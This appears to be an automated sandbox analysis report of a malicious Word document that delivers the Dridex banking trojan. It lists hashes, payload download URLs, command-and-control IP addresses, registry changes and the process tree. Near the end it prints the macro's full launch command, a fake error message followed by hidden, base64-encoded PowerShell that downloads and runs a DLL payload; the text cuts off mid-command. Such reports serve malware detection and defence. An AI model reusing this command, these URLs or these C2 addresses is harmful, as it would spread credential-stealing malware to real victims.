Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
20-11-2020 05:27
Static task
static1
Behavioral task
behavioral1
Sample
Information-822908953.doc
Resource
win7v20201028
General
-
Target
Information-822908953.doc
-
Size
117KB
-
MD5
59b5d3179a962efa890e2df17aaf31d1
-
SHA1
52b0231b64030049d61096bd2bb872ab89ac7e55
-
SHA256
d2bc5e480daba7368064d7de34a53077e968dafc86084c87191c5c3d2fb7c444
-
SHA512
4bbb5fbd99e9ae35f690dcc710d8ba168cf5361fd4857f5b9b341185834a9d1e19f641a47cf6ea18366d6f2d13e1ce457b53c12f9264b9da5fe38d02b1a29432
Malware Config
Extracted
http://veva.vn/zntk070.png
http://hardmed-eg.com/o76nxa.png
http://islamabout.com/ga140h7l.zip
http://ferretec.com/c2eivsswg.rar
http://rasadbar.ir/t6yswb.pdf
http://seniorcarecompass.inifaresworkshops.com/vr6ebzold.png
Extracted
dridex
10555
162.241.44.26:9443
192.232.229.53:4443
77.220.64.34:443
193.90.12.121:3098
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1636 1820 cmd.exe -
Processes:
resource yara_rule C:\Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll cryptone \Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll cryptone \Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll cryptone \Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll cryptone \Users\Admin\E1bad5e\Rvmn7kd\Fhdtme10.dll cryptone -
Processes:
resource yara_rule behavioral1/memory/2024-20-0x00000000007F0000-0x000000000082D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exerundll32.exeflow pid process 6 584 powershell.exe 8 2024 rundll32.exe 10 2024 rundll32.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exepid process 2024 rundll32.exe 2024 rundll32.exe 2024 rundll32.exe 2024 rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib\{BCC363E9-4C85-4B8D-899C-2C8F6406F099}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BCC363E9-4C85-4B8D-899C-2C8F6406F099}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib\{BCC363E9-4C85-4B8D-899C-2C8F6406F099}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{BCC363E9-4C85-4B8D-899C-2C8F6406F099}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1056 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 584 powershell.exe 584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 584 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1056 WINWORD.EXE 1056 WINWORD.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exeWINWORD.EXEpowershell.exerundll32.exedescription pid process target process PID 1636 wrote to memory of 1680 1636 cmd.exe msg.exe PID 1636 wrote to memory of 1680 1636 cmd.exe msg.exe PID 1636 wrote to memory of 1680 1636 cmd.exe msg.exe PID 1636 wrote to memory of 584 1636 cmd.exe powershell.exe PID 1636 wrote to memory of 584 1636 cmd.exe powershell.exe PID 1636 wrote to memory of 584 1636 cmd.exe powershell.exe PID 1056 wrote to memory of 1276 1056 WINWORD.EXE splwow64.exe PID 1056 wrote to memory of 1276 1056 WINWORD.EXE splwow64.exe PID 1056 wrote to memory of 1276 1056 WINWORD.EXE splwow64.exe PID 1056 wrote to memory of 1276 1056 WINWORD.EXE splwow64.exe PID 584 wrote to memory of 1604 584 powershell.exe rundll32.exe PID 584 wrote to memory of 1604 584 powershell.exe rundll32.exe PID 584 wrote to memory of 1604 584 powershell.exe rundll32.exe PID 1604 wrote to memory of 2024 1604 rundll32.exe rundll32.exe PID 1604 wrote to memory of 2024 1604 rundll32.exe rundll32.exe PID 1604 wrote to memory of 2024 1604 rundll32.exe rundll32.exe PID 1604 wrote to memory of 2024 1604 rundll32.exe rundll32.exe PID 1604 wrote to memory of 2024 1604 rundll32.exe rundll32.exe PID 1604 wrote to memory of 2024 1604 rundll32.exe rundll32.exe PID 1604 wrote to memory of 2024 1604 rundll32.exe rundll32.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Information-822908953.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIALQBmACcAbwAuAEQAaQAnACwAJwBzAFkAcwBUAEUATQAnACwAJwAuAGkAJwAsACcAUgBlAGMAdABvAHIAWQAnACkAIAAgACkAOwAgACAAIAAgACQARgAzADUAQwA4AFgAIAAgAD0AIAAgAFsAdAB5AFAARQBdACgAIgB7ADQAfQB7ADEAfQB7ADIAfQB7ADcAfQB7ADAAfQB7ADYAfQB7ADUAfQB7ADMAfQB7ADgAfQAiACAALQBmACAAJwBDAGUAcABPAEkAJwAsACcAeQBzAFQAZQBtAC4AbgBFAFQALgBzAEUAJwAsACcAUgBWACcALAAnAEEATgBBAGcAZQAnACwAJwBzACcALAAnAHQATQAnACwAJwBOACcALAAnAEkAJwAsACcAUgAnACkAOwAgACAAJABYAGsAYgA3AHIANQBsAD0AKAAoACcAQgA3ACcAKwAnAGYAJwApACsAJwBfACcAKwAoACcAeQAnACsAJwBnAHkAJwApACkAOwAkAFUAZwBsAHAAeABtAGcAPQAkAE0AXwBzADAAeABxADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFQANAAxAGIAbwBpAGEAOwAkAEMAcAB0AG4AawBrAGUAPQAoACgAJwBLADAAJwArACcAMAAnACkAKwAoACcAaQAnACsAJwB6AGUAdgAnACkAKQA7ACAAKAAgACAAZwBFAHQALQB2AGEAcgBJAEEAYgBMAEUAIAAgAHQANABiADcASwAgACAALQB2AEEATABVAGUAbwBuAEwAeQAgACAAKQA6ADoAIgBjAHIARQBBAHQAYABFAGAARABpAFIAYABFAEMAYABUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACgAJwBFADEAYgAnACsAJwBhACcAKQArACcAZAA1ACcAKwAnAGUAewAwAH0AUgB2AG0AJwArACcAbgAnACsAJwA3AGsAZAB7ADAAfQAnACkALQBGACAAIABbAEMASABBAFIAXQA5ADIAKQApADsAJABZADcANwA4ADMAZQBqAD0AKAAnAEwAcQAnACsAJwBmAHoAJwArACgAJwBlACcAKwAnAGsAegAnACkAKQA7ACAAIAAkAEYAMwA1AGMAOABYADoAOgAiAFMARQBgAEMAdQBgAFIAaQBUAGAAeQBwAHIAYABPAFQATwBjAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwB5ADgAaQB5AGsAZwA9ACgAKAAnAFcAZgAnACsAJwB1AHkAJwApACsAJwByACcAKwAnAHcAOAAnACkAOwAkAEsANgBiAG8AdwAxAHcAIAA9ACAAKAAnAEYAaAAnACsAKAAnAGQAdAAnACsAJwBtAGUAJwApACsAJwAxADAAJwApADsAJABCADkANgBmAHAAagBlAD0AKAAoACcARABuAGEAJwArACcAaAAnACkAKwAnAG4ANQAnACsAJwB4ACcAKQA7ACQAUgBiAHgAdQB2AF8ANQA9ACgAJwBOACcAKwAoACcAcwA4AGgAJwArACcAZgByACcAKQArACcAMgAnACkAOwAkAFUAeQB2AHoAeQB5AHEAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBFADEAYgAnACsAKAAnAGEAJwArACcAZAA1AGUAJwApACsAJwB7ADAAJwArACcAfQAnACsAKAAnAFIAdgBtAG4AJwArACcANwBrACcAKQArACcAZAB7ADAAfQAnACkALQBGAFsAYwBIAGEAcgBdADkAMgApACsAJABLADYAYgBvAHcAMQB3ACsAKAAoACcALgBkACcAKwAnAGwAJwApACsAJwBsACcAKQA7ACQAWQBiAHcAbgBsAGIAcQA9ACgAKAAnAEwAbgBtACcAKwAnAGoANwAnACkAKwAnAG8AJwArACcANQAnACkAOwAkAEYAawA3AGUAYQByAF8APQBOAGAAZQBXAC0AYABvAGAAQgBqAEUAYwB0ACAATgBlAFQALgB3AGUAQgBDAGwASQBlAE4AVAA7ACQATwBtAGkAcQAxAHMAaQA9ACgAKAAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwA6AFEAJwApACsAJwApACcAKwAoACgAJwAoAHEAZAAnACsAJwBkACkAKAAnACkAKQArACgAKAAnAFEAKQAnACsAJwAoAHEAZAAnACkAKQArACgAKAAnAGQAKQAnACsAJwAoAHYAJwApACkAKwAoACgAJwBlAHYAJwArACcAYQAuAHYAbgBRACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAZAAnACsAJwBkACkAKAAnACkAKQArACgAJwB6AG4AdABrACcAKwAnADAAJwApACsAKAAnADcAMAAuACcAKwAnAHAAbgAnACkAKwAnAGcAQAAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgBRACcAKQArACgAKAAnACkAKAAnACkAKQArACgAJwBxACcAKwAnAGQAZAAnACkAKwAoACgAJwApACgAJwApACkAKwAnAFEAJwArACgAKAAnACkAKAAnACkAKQArACcAcQAnACsAJwBkACcAKwAnAGQAJwArACcAKQAnACsAKAAoACcAKAAnACsAJwBoAGEAJwApACkAKwAoACcAcgBkACcAKwAnAG0AJwApACsAKAAnAGUAJwArACcAZAAtACcAKQArACcAZQAnACsAJwBnACcAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtACcAKwAoACgAJwBRACkAJwApACkAKwAoACgAJwAoAHEAZAAnACsAJwBkACkAJwArACcAKABvACcAKQApACsAKAAnADcAJwArACcANgBuAHgAJwApACsAJwBhAC4AJwArACgAJwBwAG4AJwArACcAZwAnACkAKwAnAEAAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoAUQAnACkAKwAoACgAJwApACgAcQAnACsAJwBkACcAKwAnAGQAKQAnACkAKQArACgAKAAnACgAUQAnACkAKQArACcAKQAnACsAKAAnACgAJwArACcAcQBkAGQAKQAnACkAKwAoACgAJwAoAGkAJwApACkAKwAnAHMAbAAnACsAJwBhACcAKwAnAG0AJwArACgAJwBhAGIAbwB1ACcAKwAnAHQAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBRACcAKwAnACkAKABxAGQAZAAnACkAKQArACgAKAAnACkAKABnAGEAMQAnACsAJwA0ADAAJwArACcAaAA3AGwALgB6ACcAKwAnAGkAcAAnACkAKQArACcAQABoACcAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAJwA6ACcAKwAoACgAJwBRACkAJwApACkAKwAoACgAJwAoAHEAJwArACcAZAAnACkAKQArACgAKAAnAGQAKQAnACkAKQArACcAKAAnACsAKAAoACcAUQApACgAcQAnACsAJwBkAGQAKQAoACcAKQApACsAKAAnAGYAZQByACcAKwAnAHIAZQB0AGUAJwArACcAYwAnACkAKwAnAC4AYwAnACsAKAAoACcAbwBtAFEAKQAoACcAKwAnAHEAZAAnACkAKQArACgAKAAnAGQAKQAoAGMAMgAnACsAJwBlAGkAdgAnACsAJwBzACcAKwAnAHMAdwBnAC4AJwArACcAcgBhAHIAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAOgAnACsAKAAoACcAUQApACcAKQApACsAKAAnACgAcQBkAGQAJwArACcAKQAnACkAKwAnACgAJwArACgAKAAnAFEAKQAnACkAKQArACcAKAAnACsAJwBxACcAKwAoACgAJwBkAGQAJwArACcAKQAnACkAKQArACgAJwAoACcAKwAnAHIAYQBzAGEAZABiAGEAcgAuACcAKwAnAGkAcgBRACkAJwApACsAKAAoACcAKAAnACsAJwBxAGQAJwApACkAKwAnAGQAJwArACgAKAAnACkAJwArACcAKAB0ADYAeQBzACcAKwAnAHcAYgAuAHAAJwApACkAKwAoACcAZABmACcAKwAnAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACgAKAAnAFEAKQAnACkAKQArACgAJwAoAHEAZAAnACsAJwBkACcAKwAnACkAKABRACkAJwApACsAKAAoACcAKABxACcAKQApACsAJwBkACcAKwAoACgAJwBkACkAJwApACkAKwAoACgAJwAoACcAKwAnAHMAZQBuACcAKwAnAGkAbwAnACkAKQArACcAcgBjACcAKwAnAGEAcgAnACsAJwBlAGMAJwArACgAJwBvAG0AcABhACcAKwAnAHMAJwApACsAJwBzACcAKwAoACcALgAnACsAJwBpAG4AJwApACsAKAAnAGkAJwArACcAZgBhACcAKQArACcAcgBlACcAKwAoACcAcwB3ACcAKwAnAG8AcgBrACcAKQArACcAcwAnACsAJwBoAG8AJwArACcAcAAnACsAJwBzACcAKwAnAC4AJwArACcAYwAnACsAKAAoACcAbwBtAFEAJwArACcAKQAnACkAKQArACgAKAAnACgAcQBkAGQAJwArACcAKQAoACcAKQApACsAKAAnAHYAJwArACcAcgA2AGUAYgB6ACcAKwAnAG8AbABkAC4AJwArACcAcABuAGcAJwApACsAJwBAACcAKQApAC4AIgBSAGUAcABMAGEAYABDAEUAIgAoACgAKAAoACgAJwBRACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAZAAnACsAJwBkACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAFMAUABgAEwAaQB0ACIAKAAkAEwANQB5AGQAYwBvAHYAIAArACAAJABVAGcAbABwAHgAbQBnACAAKwAgACQAQwBrAHgAOABuADkAZQApADsAJABQAGMAagBsAGgAawBvAD0AKAAnAFAAMQAnACsAKAAnAGUAJwArACcAaQB4AHUAeQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQB5ADMAOQBnAF8AdgAgAGkAbgAgACQATwBtAGkAcQAxAHMAaQAgAHwAIABTAGAATwBgAFIAYABUAC0AbwBiAGoAYABFAGMAVAAgAHsAZwBFAGAAVAAtAFIAQQBgAE4AZABgAG8AbQB9ACkAewB0AHIAeQB7ACQARgBrADcAZQBhAHIAXwAuACIARABgAG8AVwBuAEwATwBhAGAARABGAGAASQBsAEUAIgAoACQAVQB5ADMAOQB